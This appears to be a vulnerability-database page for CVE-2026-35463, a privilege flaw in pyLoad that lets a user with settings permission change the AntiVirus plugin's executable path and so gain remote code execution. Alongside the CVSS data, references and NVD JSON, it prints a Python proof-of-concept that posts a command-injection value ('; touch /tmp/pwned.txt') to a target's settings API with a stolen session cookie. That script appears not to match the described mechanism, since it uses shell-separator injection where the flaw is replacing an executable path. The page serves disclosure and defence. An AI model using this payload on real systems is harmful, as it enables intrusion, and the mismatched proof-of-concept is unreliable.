CVE-2026-35463

Description

pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the ADMIN_ONLY_OPTIONS protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is only applied to core config options, not to plugin config options. The AntiVirus plugin stores an executable path (avfile) in its config, which is passed directly to subprocess.Popen(). A non-admin user with SETTINGS permission can change this path to achieve remote code execution.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:* - VULNERABLE

pyLoad <= 0.5.0b3.dev96

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = "http://target-ip/api/settings/antivirus"

# Attacker's session cookie (requires SETTINGS permission)
cookies = {"session": "attacker_session_cookie"}

# Malicious payload: executing a simple command
data = {
    "avfile": "; touch /tmp/pwned.txt", # Example payload depending on OS context
    "enabled": "true"
}

# Send request to update plugin configuration
response = requests.post(url, json=data, cookies=cookies)

if response.status_code == 200:
    print("[+] Payload sent successfully. RCE triggered when plugin runs.")
else:
    print("[-] Failed to send payload.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35463
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35463
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35463/
[4] VulDB https://vuldb.com/cve/CVE-2026-35463
[5] https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1
[6] https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35463", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:44.363", "lastModified": "2026-04-24T15:18:49.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the ADMIN_ONLY_OPTIONS protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is only applied to core config options, not to plugin config options. The AntiVirus plugin stores an executable path (avfile) in its config, which is passed directly to subprocess.Popen(). A non-admin user with SETTINGS permission can change this path to achieve remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*", "versionEndIncluding": "0.5.0b3.dev96", "matchCriteriaId": "0F5DE8DC-98B9-4A24-89F9-C2FEFD254815"}]}]}], "references": [{"url": "https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}